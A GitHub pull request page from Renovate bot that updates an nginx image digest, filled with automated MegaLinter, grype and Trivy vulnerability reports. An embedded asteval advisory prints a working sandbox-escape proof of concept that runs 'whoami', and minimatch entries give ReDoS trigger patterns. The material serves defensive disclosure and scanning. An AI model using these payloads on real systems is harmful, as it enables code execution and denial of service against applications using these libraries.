chore(deps): update docker.io/nginxinc/nginx-unprivileged:1.29.5 docker digest to 204990d#630
Open
renovate[bot] wants to merge 1 commit intomasterfrom
Open
Conversation
✅
|
| Descriptor | Linter | Files | Fixed | Errors | Warnings | Elapsed time |
|---|---|---|---|---|---|---|
| ✅ ACTION | actionlint | 4 | 0 | 0 | 0.11s | |
| ✅ BASH | bash-exec | 4 | 0 | 0 | 0.04s | |
| ✅ BASH | shellcheck | 4 | 0 | 0 | 0.3s | |
| ✅ BASH | shfmt | 4 | 0 | 0 | 0.01s | |
| ✅ DOCKERFILE | hadolint | 1 | 0 | 0 | 1.75s | |
| ✅ EDITORCONFIG | editorconfig-checker | 50 | 0 | 0 | 0.04s | |
| ✅ JSON | jsonlint | 4 | 0 | 0 | 0.41s | |
| ✅ JSON | npm-package-json-lint | yes | no | no | 0.66s | |
| ✅ JSON | prettier | 4 | 0 | 0 | 0.93s | |
| ✅ JSON | v8r | 4 | 0 | 0 | 8.48s | |
| markdownlint | 5 | 9 | 0 | 1.13s | ||
| ✅ REPOSITORY | checkov | yes | no | no | 43.38s | |
| ✅ REPOSITORY | devskim | yes | no | no | 2.09s | |
| ✅ REPOSITORY | gitleaks | yes | no | no | 1.07s | |
| ✅ REPOSITORY | git_diff | yes | no | no | 0.01s | |
| grype | yes | 8 | 2 | 48.4s | ||
| ✅ REPOSITORY | kics | yes | no | no | 15.0s | |
| ✅ REPOSITORY | secretlint | yes | no | no | 2.15s | |
| ✅ REPOSITORY | syft | yes | no | no | 3.2s | |
| trivy | yes | 8 | 2 | 12.78s | ||
| ✅ REPOSITORY | trivy-sbom | yes | no | no | 0.71s | |
| ✅ REPOSITORY | trufflehog | yes | no | no | 4.4s |
Detailed Issues
⚠️ REPOSITORY / grype - 8 errors
warning: A medium vulnerability in github-action package: aquasecurity/trivy-action, version 0.33.1 was found at: /.github/workflows/daily-trivy-scan.yaml
error: A high vulnerability in npm package: minimatch, version 10.1.1 was found at: /package-lock.json
error: A high vulnerability in npm package: minimatch, version 10.1.1 was found at: /package-lock.json
error: A high vulnerability in npm package: minimatch, version 10.1.1 was found at: /package-lock.json
error: A high vulnerability in python package: asteval, version 1.0.5 was found at: /requirements.txt
error: A high vulnerability in python package: urllib3, version 1.26.20 was found at: /requirements.txt
error: A high vulnerability in python package: urllib3, version 1.26.20 was found at: /requirements.txt
error: A high vulnerability in python package: urllib3, version 1.26.20 was found at: /requirements.txt
warning: A medium vulnerability in python package: urllib3, version 1.26.20 was found at: /requirements.txt
error: A high vulnerability in python package: asteval, version 1.0.5 was found at: /requirements.txt
warning: 2 warnings emitted
error: 8 errors emitted
⚠️ MARKDOWN / markdownlint - 9 errors
samples/charts/sample/README.md:5:9 MD026/no-trailing-punctuation Trailing punctuation in heading [Punctuation: ';']
samples/charts/sample/README.md:8:1 MD014/commands-show-output Dollar signs used before commands without showing output [Context: "$ helm repo add chgl https://c..."]
samples/charts/sample/README.md:9:1 MD014/commands-show-output Dollar signs used before commands without showing output [Context: "$ helm repo update"]
samples/charts/sample/README.md:10:1 MD014/commands-show-output Dollar signs used before commands without showing output [Context: "$ helm search repo chgl/sample..."]
samples/charts/sample/README.md:11:1 MD014/commands-show-output Dollar signs used before commands without showing output [Context: "$ helm upgrade -i sample chgl/..."]
samples/charts/sample/README.md:28:1 MD014/commands-show-output Dollar signs used before commands without showing output [Context: "$ helm upgrade -i sample chgl/..."]
samples/charts/sample/README.md:40:1 MD014/commands-show-output Dollar signs used before commands without showing output [Context: "$ helm uninstall sample -n sam..."]
samples/charts/sample/README.md:90:1 MD014/commands-show-output Dollar signs used before commands without showing output [Context: "$ helm upgrade -i sample chgl/..."]
samples/charts/sample/README.md:97:1 MD014/commands-show-output Dollar signs used before commands without showing output [Context: "$ helm upgrade -i sample chgl/..."]
⚠️ REPOSITORY / trivy - 8 errors
error: Package: minimatch
Installed Version: 10.1.1
Vulnerability CVE-2026-26996
Severity: HIGH
Fixed Version: 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3
Link: [CVE-2026-26996](https://avd.aquasec.com/nvd/cve-2026-26996)
┌─ package-lock.json:922:1
│
922 │ ╭ "node_modules/minimatch": {
923 │ │ "version": "10.1.1",
924 │ │ "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-10.1.1.tgz",
925 │ │ "integrity": "sha512-enIvLvRAFZYXJzkCYG5RKmPfrFArdLv+R+lbQ53BmIMLIry74bjKzX6iHAm8WYamJkhSSEabrWN5D97XnKObjQ==",
· │
935 │ │ }
936 │ │ },
│ ╰^
│
= minimatch: minimatch: Denial of Service via specially crafted glob patterns
= minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1.
error: Package: minimatch
Installed Version: 10.1.1
Vulnerability CVE-2026-27903
Severity: HIGH
Fixed Version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3
Link: [CVE-2026-27903](https://avd.aquasec.com/nvd/cve-2026-27903)
┌─ package-lock.json:922:1
│
922 │ ╭ "node_modules/minimatch": {
923 │ │ "version": "10.1.1",
924 │ │ "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-10.1.1.tgz",
925 │ │ "integrity": "sha512-enIvLvRAFZYXJzkCYG5RKmPfrFArdLv+R+lbQ53BmIMLIry74bjKzX6iHAm8WYamJkhSSEabrWN5D97XnKObjQ==",
· │
935 │ │ }
936 │ │ },
│ ╰^
│
= minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns
= minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue.
error: Package: minimatch
Installed Version: 10.1.1
Vulnerability CVE-2026-27904
Severity: HIGH
Fixed Version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4
Link: [CVE-2026-27904](https://avd.aquasec.com/nvd/cve-2026-27904)
┌─ package-lock.json:922:1
│
922 │ ╭ "node_modules/minimatch": {
923 │ │ "version": "10.1.1",
924 │ │ "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-10.1.1.tgz",
925 │ │ "integrity": "sha512-enIvLvRAFZYXJzkCYG5RKmPfrFArdLv+R+lbQ53BmIMLIry74bjKzX6iHAm8WYamJkhSSEabrWN5D97XnKObjQ==",
· │
935 │ │ }
936 │ │ },
│ ╰^
│
= minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions
= minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.
error: Package: asteval
Installed Version: 1.0.5
Vulnerability CVE-2025-24359
Severity: HIGH
Fixed Version: 1.0.6
Link: [CVE-2025-24359](https://avd.aquasec.com/nvd/cve-2025-24359)
┌─ requirements.txt:149:1
│
149 │ asteval==1.0.5 \
│ ^
│
= ASTEVAL is an evaluator of Python expressions and statements. Prior to ...
= ASTEVAL is an evaluator of Python expressions and statements. Prior to version 1.0.6, if an attacker can control the input to the `asteval` library, they can bypass asteval's restrictions and execute arbitrary Python code in the context of the application using the library. The vulnerability is rooted in how `asteval` performs handling of `FormattedValue` AST nodes. In particular, the `on_formattedvalue` value uses the dangerous format method of the str class. The code allows an attacker to manipulate the value of the string used in the dangerous call `fmt.format(__fstring__=val)`. This vulnerability can be exploited to access protected attributes by intentionally triggering an `AttributeError` exception. The attacker can then catch the exception and use its `obj` attribute to gain arbitrary access to sensitive or protected object properties. Version 1.0.6 fixes this issue.
error: Package: asteval
Installed Version: 1.0.5
Vulnerability GHSA-vp47-9734-prjw
Severity: HIGH
Fixed Version: 1.0.6
Link: [GHSA-vp47-9734-prjw](https://github.com/advisories/GHSA-vp47-9734-prjw)
┌─ requirements.txt:149:1
│
149 │ asteval==1.0.5 \
│ ^
│
= ASTEVAL Allows Malicious Tampering of Exposed AST Nodes Leads to Sandbox Escape
= ### Summary
If an attacker can control the input to the asteval library, they can bypass its safety restrictions and execute arbitrary Python code within the application's context.
### Details
The vulnerability is rooted in how `asteval` performs attribute access verification. In particular, the [`on_attribute`](https://github.com/lmfit/asteval/blob/8d7326df8015cf6a57506b1c2c167a1c3763e090/asteval/asteval.py#L565) node handler prevents access to attributes that are either present in the `UNSAFE_ATTRS` list or are formed by names starting and ending with `__`, as shown in the code snippet below:
```py
def on_attribute(self, node): # ('value', 'attr', 'ctx')
"""Extract attribute."""
ctx = node.ctx.__class__
if ctx == ast.Store:
msg = "attribute for storage: shouldn't be here!"
self.raise_exception(node, exc=RuntimeError, msg=msg)
sym = self.run(node.value)
if ctx == ast.Del:
return delattr(sym, node.attr)
#
unsafe = (node.attr in UNSAFE_ATTRS or
(node.attr.startswith('__') and node.attr.endswith('__')))
if not unsafe:
for dtype, attrlist in UNSAFE_ATTRS_DTYPES.items():
unsafe = isinstance(sym, dtype) and node.attr in attrlist
if unsafe:
break
if unsafe:
msg = f"no safe attribute '{node.attr}' for {repr(sym)}"
self.raise_exception(node, exc=AttributeError, msg=msg)
else:
try:
return getattr(sym, node.attr)
except AttributeError:
pass
```
While this check is intended to block access to sensitive Python dunder methods (such as `__getattribute__`), the flaw arises because instances of the `Procedure` class expose their AST (stored in the `body` attribute) without proper protection:
```py
class Procedure:
"""Procedure: user-defined function for asteval.
This stores the parsed ast nodes as from the 'functiondef' ast node
for later evaluation.
"""
def __init__(self, name, interp, doc=None, lineno=0,
body=None, args=None, kwargs=None,
vararg=None, varkws=None):
"""TODO: docstring in public method."""
self.__ininit__ = True
self.name = name
self.__name__ = self.name
self.__asteval__ = interp
self.raise_exc = self.__asteval__.raise_exception
self.__doc__ = doc
self.body = body
self.argnames = args
self.kwargs = kwargs
self.vararg = vararg
self.varkws = varkws
self.lineno = lineno
self.__ininit__ = False
```
Since the `body` attribute is not protected by a naming convention that would restrict its modification, an attacker can modify the AST of a `Procedure` during runtime to leverage unintended behaviour.
The exploit works as follows:
1. **The Time of Check, Time of Use (TOCTOU) Gadget:**
In the [code](https://github.com/lmfit/asteval/blob/8d7326df8015cf6a57506b1c2c167a1c3763e090/asteval/asteval.py#L577) below, a variable named `unsafe` is set based on whether `node.attr` is considered unsafe:
```python
unsafe = (node.attr in UNSAFE_ATTRS or
(node.attr.startswith('__') and node.attr.endswith('__')))
```
2. **Exploiting the TOCTOU Gadget:**
An attacker can abuse this gadget by hooking any `Attribute` AST node that is not in the `UNSAFE_ATTRS` list. The attacker modifies the `node.attr.startswith` function so that it points to a custom procedure. This custom procedure performs the following steps:
- It replaces the value of `node.attr` with the string `"__getattribute__"` and returns `False`.
- Thus, when `node.attr.startswith('__')` is evaluated, it returns `False`, which causes the condition to short-circuit and sets `unsafe` to `False`.
- However, by that time, `node.attr` has been changed to `"__getattribute__"`, which will be used in the subsequent `getattr(sym, node.attr)` call. An attacker can then use the obtained reference to `sym.__getattr__`to retrieve malicious attributes without needing to pass the `on_attribute` checks.
### PoC
The following proof-of-concept (PoC) demonstrates how this vulnerability can be exploited to execute the `whoami` command on the host machine:
```py
from asteval import Interpreter
aeval = Interpreter()
code = """
ga_str = "__getattribute__"
def lender():
a
b
def pwn():
ga = lender.dontcare
init = ga("__init__")
ga = init.dontcare
globals = ga("__globals__")
builtins = globals["__builtins__"]
importer = builtins["__import__"]
importer("os").system("whoami")
def startswith1(str):
# Replace the attr on the targeted AST node with "__getattribute__"
pwn.body[0].value.attr = ga_str
return False
def startswith2(str):
pwn.body[2].value.attr = ga_str
return False
n1 = lender.body[0]
n1.startswith = startswith1
pwn.body[0].value.attr = n1
n2 = lender.body[1]
n2.startswith = startswith2
pwn.body[2].value.attr = n2
pwn()
"""
aeval(code)
```
error: Package: urllib3
Installed Version: 1.26.20
Vulnerability CVE-2025-66418
Severity: HIGH
Fixed Version: 2.6.0
Link: [CVE-2025-66418](https://avd.aquasec.com/nvd/cve-2025-66418)
┌─ requirements.txt:1700:1
│
1700 │ urllib3==1.26.20 \
│ ^
│
= urllib3: urllib3: Unbounded decompression chain leads to resource exhaustion
= urllib3 is a user-friendly HTTP client library for Python. Starting in version 1.24 and prior to 2.6.0, the number of links in the decompression chain was unbounded allowing a malicious server to insert a
(Truncated to 13333 characters out of 18094)
See detailed reports in MegaLinter artifacts
You could have the same capabilities but better runtime performances if you use a MegaLinter flavor:
- oxsecurity/megalinter/flavors/cupcake@v9.2.0 (88 linters)
Your project could benefit from a custom flavor, which would allow you to run only the linters you need, and thus improve runtime performances. (Skip this info by defining FLAVOR_SUGGESTIONS: false)
- Documentation: Custom Flavors
- Command:
npx mega-linter-runner@9.2.0 --custom-flavor-setup --custom-flavor-linters ACTION_ACTIONLINT,BASH_EXEC,BASH_SHELLCHECK,BASH_SHFMT,DOCKERFILE_HADOLINT,EDITORCONFIG_EDITORCONFIG_CHECKER,JSON_JSONLINT,JSON_V8R,JSON_PRETTIER,JSON_NPM_PACKAGE_JSON_LINT,MARKDOWN_MARKDOWNLINT,REPOSITORY_CHECKOV,REPOSITORY_DEVSKIM,REPOSITORY_GIT_DIFF,REPOSITORY_GITLEAKS,REPOSITORY_GRYPE,REPOSITORY_KICS,REPOSITORY_SECRETLINT,REPOSITORY_SYFT,REPOSITORY_TRIVY,REPOSITORY_TRIVY_SBOM,REPOSITORY_TRUFFLEHOG
b507e0e
e87acfd to
b507e0e
Compare
33023aa to
df59a6b
Compare
Trivy image scan report
|
| Package | ID | Severity | Installed Version | Fixed Version |
|---|---|---|---|---|
curl |
CVE-2025-14017 | MEDIUM | 8.5.0-2ubuntu10.6 | 8.5.0-2ubuntu10.7 |
curl |
CVE-2025-10148 | LOW | 8.5.0-2ubuntu10.6 | 8.5.0-2ubuntu10.7 |
curl |
CVE-2025-14524 | LOW | 8.5.0-2ubuntu10.6 | 8.5.0-2ubuntu10.7 |
curl |
CVE-2025-14819 | LOW | 8.5.0-2ubuntu10.6 | 8.5.0-2ubuntu10.7 |
curl |
CVE-2025-15079 | LOW | 8.5.0-2ubuntu10.6 | 8.5.0-2ubuntu10.7 |
curl |
CVE-2025-15224 | LOW | 8.5.0-2ubuntu10.6 | 8.5.0-2ubuntu10.7 |
libc-bin |
CVE-2025-15281 | MEDIUM | 2.39-0ubuntu8.6 | 2.39-0ubuntu8.7 |
libc-bin |
CVE-2026-0861 | MEDIUM | 2.39-0ubuntu8.6 | 2.39-0ubuntu8.7 |
libc-bin |
CVE-2026-0915 | MEDIUM | 2.39-0ubuntu8.6 | 2.39-0ubuntu8.7 |
libc6 |
CVE-2025-15281 | MEDIUM | 2.39-0ubuntu8.6 | 2.39-0ubuntu8.7 |
libc6 |
CVE-2026-0861 | MEDIUM | 2.39-0ubuntu8.6 | 2.39-0ubuntu8.7 |
libc6 |
CVE-2026-0915 | MEDIUM | 2.39-0ubuntu8.6 | 2.39-0ubuntu8.7 |
libcurl3t64-gnutls |
CVE-2025-14017 | MEDIUM | 8.5.0-2ubuntu10.6 | 8.5.0-2ubuntu10.7 |
libcurl3t64-gnutls |
CVE-2025-10148 | LOW | 8.5.0-2ubuntu10.6 | 8.5.0-2ubuntu10.7 |
libcurl3t64-gnutls |
CVE-2025-14524 | LOW | 8.5.0-2ubuntu10.6 | 8.5.0-2ubuntu10.7 |
libcurl3t64-gnutls |
CVE-2025-14819 | LOW | 8.5.0-2ubuntu10.6 | 8.5.0-2ubuntu10.7 |
libcurl3t64-gnutls |
CVE-2025-15079 | LOW | 8.5.0-2ubuntu10.6 | 8.5.0-2ubuntu10.7 |
libcurl3t64-gnutls |
CVE-2025-15224 | LOW | 8.5.0-2ubuntu10.6 | 8.5.0-2ubuntu10.7 |
libcurl4t64 |
CVE-2025-14017 | MEDIUM | 8.5.0-2ubuntu10.6 | 8.5.0-2ubuntu10.7 |
libcurl4t64 |
CVE-2025-10148 | LOW | 8.5.0-2ubuntu10.6 | 8.5.0-2ubuntu10.7 |
libcurl4t64 |
CVE-2025-14524 | LOW | 8.5.0-2ubuntu10.6 | 8.5.0-2ubuntu10.7 |
libcurl4t64 |
CVE-2025-14819 | LOW | 8.5.0-2ubuntu10.6 | 8.5.0-2ubuntu10.7 |
libcurl4t64 |
CVE-2025-15079 | LOW | 8.5.0-2ubuntu10.6 | 8.5.0-2ubuntu10.7 |
libcurl4t64 |
CVE-2025-15224 | LOW | 8.5.0-2ubuntu10.6 | 8.5.0-2ubuntu10.7 |
libexpat1 |
CVE-2026-24515 | MEDIUM | 2.6.1-2ubuntu0.3 | 2.6.1-2ubuntu0.4 |
libexpat1 |
CVE-2026-25210 | MEDIUM | 2.6.1-2ubuntu0.3 | 2.6.1-2ubuntu0.4 |
libgnutls30t64 |
CVE-2025-14831 | MEDIUM | 3.8.3-1.1ubuntu3.4 | 3.8.3-1.1ubuntu3.5 |
libgnutls30t64 |
CVE-2025-9820 | LOW | 3.8.3-1.1ubuntu3.4 | 3.8.3-1.1ubuntu3.5 |
libpython3.12-minimal |
CVE-2025-11468 | MEDIUM | 3.12.3-1ubuntu0.10 | 3.12.3-1ubuntu0.11 |
libpython3.12-minimal |
CVE-2025-12084 | MEDIUM | 3.12.3-1ubuntu0.10 | 3.12.3-1ubuntu0.11 |
libpython3.12-minimal |
CVE-2025-13837 | MEDIUM | 3.12.3-1ubuntu0.10 | 3.12.3-1ubuntu0.11 |
libpython3.12-minimal |
CVE-2025-15282 | MEDIUM | 3.12.3-1ubuntu0.10 | 3.12.3-1ubuntu0.11 |
libpython3.12-minimal |
CVE-2025-15366 | MEDIUM | 3.12.3-1ubuntu0.10 | 3.12.3-1ubuntu0.11 |
libpython3.12-minimal |
CVE-2025-15367 | MEDIUM | 3.12.3-1ubuntu0.10 | 3.12.3-1ubuntu0.11 |
libpython3.12-minimal |
CVE-2026-0672 | MEDIUM | 3.12.3-1ubuntu0.10 | 3.12.3-1ubuntu0.11 |
libpython3.12-minimal |
CVE-2026-0865 | MEDIUM | 3.12.3-1ubuntu0.10 | 3.12.3-1ubuntu0.11 |
libpython3.12-stdlib |
CVE-2025-11468 | MEDIUM | 3.12.3-1ubuntu0.10 | 3.12.3-1ubuntu0.11 |
libpython3.12-stdlib |
CVE-2025-12084 | MEDIUM | 3.12.3-1ubuntu0.10 | 3.12.3-1ubuntu0.11 |
libpython3.12-stdlib |
CVE-2025-13837 | MEDIUM | 3.12.3-1ubuntu0.10 | 3.12.3-1ubuntu0.11 |
libpython3.12-stdlib |
CVE-2025-15282 | MEDIUM | 3.12.3-1ubuntu0.10 | 3.12.3-1ubuntu0.11 |
libpython3.12-stdlib |
CVE-2025-15366 | MEDIUM | 3.12.3-1ubuntu0.10 | 3.12.3-1ubuntu0.11 |
libpython3.12-stdlib |
CVE-2025-15367 | MEDIUM | 3.12.3-1ubuntu0.10 | 3.12.3-1ubuntu0.11 |
libpython3.12-stdlib |
CVE-2026-0672 | MEDIUM | 3.12.3-1ubuntu0.10 | 3.12.3-1ubuntu0.11 |
libpython3.12-stdlib |
CVE-2026-0865 | MEDIUM | 3.12.3-1ubuntu0.10 | 3.12.3-1ubuntu0.11 |
libssh-4 |
CVE-2026-0964 | MEDIUM | 0.10.6-2ubuntu0.2 | 0.10.6-2ubuntu0.3 |
libssh-4 |
CVE-2026-0967 | MEDIUM | 0.10.6-2ubuntu0.2 | 0.10.6-2ubuntu0.3 |
libssh-4 |
CVE-2026-0968 | MEDIUM | 0.10.6-2ubuntu0.2 | 0.10.6-2ubuntu0.3 |
libssh-4 |
CVE-2025-8277 | LOW | 0.10.6-2ubuntu0.2 | 0.10.6-2ubuntu0.3 |
libssh-4 |
CVE-2026-0965 | LOW | 0.10.6-2ubuntu0.2 | 0.10.6-2ubuntu0.3 |
libssh-4 |
CVE-2026-0966 | LOW | 0.10.6-2ubuntu0.2 | 0.10.6-2ubuntu0.3 |
libssl-dev |
CVE-2025-15467 | MEDIUM | 3.0.13-0ubuntu3.6 | 3.0.13-0ubuntu3.7 |
libssl-dev |
CVE-2025-68160 | LOW | 3.0.13-0ubuntu3.6 | 3.0.13-0ubuntu3.7 |
libssl-dev |
CVE-2025-69418 | LOW | 3.0.13-0ubuntu3.6 | 3.0.13-0ubuntu3.7 |
libssl-dev |
CVE-2025-69419 | LOW | 3.0.13-0ubuntu3.6 | 3.0.13-0ubuntu3.7 |
libssl-dev |
CVE-2025-69420 | LOW | 3.0.13-0ubuntu3.6 | 3.0.13-0ubuntu3.7 |
libssl-dev |
CVE-2025-69421 | LOW | 3.0.13-0ubuntu3.6 | 3.0.13-0ubuntu3.7 |
libssl-dev |
CVE-2026-22795 | LOW | 3.0.13-0ubuntu3.6 | 3.0.13-0ubuntu3.7 |
libssl-dev |
CVE-2026-22796 | LOW | 3.0.13-0ubuntu3.6 | 3.0.13-0ubuntu3.7 |
libssl3t64 |
CVE-2025-15467 | MEDIUM | 3.0.13-0ubuntu3.6 | 3.0.13-0ubuntu3.7 |
libssl3t64 |
CVE-2025-68160 | LOW | 3.0.13-0ubuntu3.6 | 3.0.13-0ubuntu3.7 |
libssl3t64 |
CVE-2025-69418 | LOW | 3.0.13-0ubuntu3.6 | 3.0.13-0ubuntu3.7 |
libssl3t64 |
CVE-2025-69419 | LOW | 3.0.13-0ubuntu3.6 | 3.0.13-0ubuntu3.7 |
libssl3t64 |
CVE-2025-69420 | LOW | 3.0.13-0ubuntu3.6 | 3.0.13-0ubuntu3.7 |
libssl3t64 |
CVE-2025-69421 | LOW | 3.0.13-0ubuntu3.6 | 3.0.13-0ubuntu3.7 |
libssl3t64 |
CVE-2026-22795 | LOW | 3.0.13-0ubuntu3.6 | 3.0.13-0ubuntu3.7 |
libssl3t64 |
CVE-2026-22796 | LOW | 3.0.13-0ubuntu3.6 | 3.0.13-0ubuntu3.7 |
openssl |
CVE-2025-15467 | MEDIUM | 3.0.13-0ubuntu3.6 | 3.0.13-0ubuntu3.7 |
openssl |
CVE-2025-68160 | LOW | 3.0.13-0ubuntu3.6 | 3.0.13-0ubuntu3.7 |
openssl |
CVE-2025-69418 | LOW | 3.0.13-0ubuntu3.6 | 3.0.13-0ubuntu3.7 |
openssl |
CVE-2025-69419 | LOW | 3.0.13-0ubuntu3.6 | 3.0.13-0ubuntu3.7 |
openssl |
CVE-2025-69420 | LOW | 3.0.13-0ubuntu3.6 | 3.0.13-0ubuntu3.7 |
openssl |
CVE-2025-69421 | LOW | 3.0.13-0ubuntu3.6 | 3.0.13-0ubuntu3.7 |
openssl |
CVE-2026-22795 | LOW | 3.0.13-0ubuntu3.6 | 3.0.13-0ubuntu3.7 |
openssl |
CVE-2026-22796 | LOW | 3.0.13-0ubuntu3.6 | 3.0.13-0ubuntu3.7 |
python3.12 |
CVE-2025-11468 | MEDIUM | 3.12.3-1ubuntu0.10 | 3.12.3-1ubuntu0.11 |
python3.12 |
CVE-2025-12084 | MEDIUM | 3.12.3-1ubuntu0.10 | 3.12.3-1ubuntu0.11 |
python3.12 |
CVE-2025-13837 | MEDIUM | 3.12.3-1ubuntu0.10 | 3.12.3-1ubuntu0.11 |
python3.12 |
CVE-2025-15282 | MEDIUM | 3.12.3-1ubuntu0.10 | 3.12.3-1ubuntu0.11 |
python3.12 |
CVE-2025-15366 | MEDIUM | 3.12.3-1ubuntu0.10 | 3.12.3-1ubuntu0.11 |
python3.12 |
CVE-2025-15367 | MEDIUM | 3.12.3-1ubuntu0.10 | 3.12.3-1ubuntu0.11 |
python3.12 |
CVE-2026-0672 | MEDIUM | 3.12.3-1ubuntu0.10 | 3.12.3-1ubuntu0.11 |
python3.12 |
CVE-2026-0865 | MEDIUM | 3.12.3-1ubuntu0.10 | 3.12.3-1ubuntu0.11 |
python3.12-minimal |
CVE-2025-11468 | MEDIUM | 3.12.3-1ubuntu0.10 | 3.12.3-1ubuntu0.11 |
python3.12-minimal |
CVE-2025-12084 | MEDIUM | 3.12.3-1ubuntu0.10 | 3.12.3-1ubuntu0.11 |
python3.12-minimal |
CVE-2025-13837 | MEDIUM | 3.12.3-1ubuntu0.10 | 3.12.3-1ubuntu0.11 |
python3.12-minimal |
CVE-2025-15282 | MEDIUM | 3.12.3-1ubuntu0.10 | 3.12.3-1ubuntu0.11 |
python3.12-minimal |
CVE-2025-15366 | MEDIUM | 3.12.3-1ubuntu0.10 | 3.12.3-1ubuntu0.11 |
python3.12-minimal |
CVE-2025-15367 | MEDIUM | 3.12.3-1ubuntu0.10 | 3.12.3-1ubuntu0.11 |
python3.12-minimal |
CVE-2026-0672 | MEDIUM | 3.12.3-1ubuntu0.10 | 3.12.3-1ubuntu0.11 |
python3.12-minimal |
CVE-2026-0865 | MEDIUM | 3.12.3-1ubuntu0.10 | 3.12.3-1ubuntu0.11 |
No Misconfigurations found
Node.js
3 known vulnerabilities found (CRITICAL: 0 HIGH: 3 MEDIUM: 0 LOW: 0)
Show detailed table of vulnerabilities
| Package | ID | Severity | Installed Version | Fixed Version |
|---|---|---|---|---|
minimatch |
CVE-2026-26996 | HIGH | 10.1.1 | 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3 |
minimatch |
CVE-2026-27903 | HIGH | 10.1.1 | 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3 |
minimatch |
CVE-2026-27904 | HIGH | 10.1.1 | 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4 |
No Misconfigurations found
Python
7 known vulnerabilities found (CRITICAL: 0 HIGH: 5 MEDIUM: 2 LOW: 0)
Show detailed table of vulnerabilities
| Package | ID | Severity | Installed Version | Fixed Version |
|---|---|---|---|---|
asteval |
CVE-2025-24359 | HIGH | 1.0.5 | 1.0.6 |
asteval |
GHSA-vp47-9734-prjw | HIGH | 1.0.5 | 1.0.6 |
filelock |
CVE-2026-22701 | MEDIUM | 3.20.1 | 3.20.3 |
urllib3 |
CVE-2025-66418 | HIGH | 1.26.20 | 2.6.0 |
urllib3 |
CVE-2025-66471 | HIGH | 1.26.20 | 2.6.0 |
urllib3 |
CVE-2026-21441 | HIGH | 1.26.20 | 2.6.3 |
urllib3 |
CVE-2025-50181 | MEDIUM | 1.26.20 | 2.5.0 |
No Misconfigurations found
root/.local/share/helm/plugins/helm-local-chart-version/local-chart-version
49 known vulnerabilities found (HIGH: 12 MEDIUM: 35 LOW: 0 CRITICAL: 2)
Show detailed table of vulnerabilities
| Package | ID | Severity | Installed Version | Fixed Version |
|---|---|---|---|---|
google.golang.org/protobuf |
CVE-2024-24786 | MEDIUM | v1.21.0 | 1.33.0 |
k8s.io/apimachinery |
GHSA-74fp-r6jw-h4mp | HIGH | v0.0.0-20180103014849-68f9c3a1feb3 | 0.0.0-20190927203648-9ce6eca90e73 |
k8s.io/apimachinery |
CVE-2020-8559 | MEDIUM | v0.0.0-20180103014849-68f9c3a1feb3 | 0.16.13, 0.17.9, 0.18.7 |
stdlib |
CVE-2024-24790 | CRITICAL | v1.20.4 | 1.21.11, 1.22.4 |
stdlib |
CVE-2025-68121 | CRITICAL | v1.20.4 | 1.24.13, 1.25.7, 1.26.0-rc.3 |
stdlib |
CVE-2023-29403 | HIGH | v1.20.4 | 1.19.10, 1.20.5 |
stdlib |
CVE-2023-39325 | HIGH | v1.20.4 | 1.20.10, 1.21.3 |
stdlib |
CVE-2023-45283 | HIGH | v1.20.4 | 1.20.11, 1.21.4, 1.20.12, 1.21.5 |
stdlib |
CVE-2023-45288 | HIGH | v1.20.4 | 1.21.9, 1.22.2 |
stdlib |
CVE-2024-34156 | HIGH | v1.20.4 | 1.22.7, 1.23.1 |
stdlib |
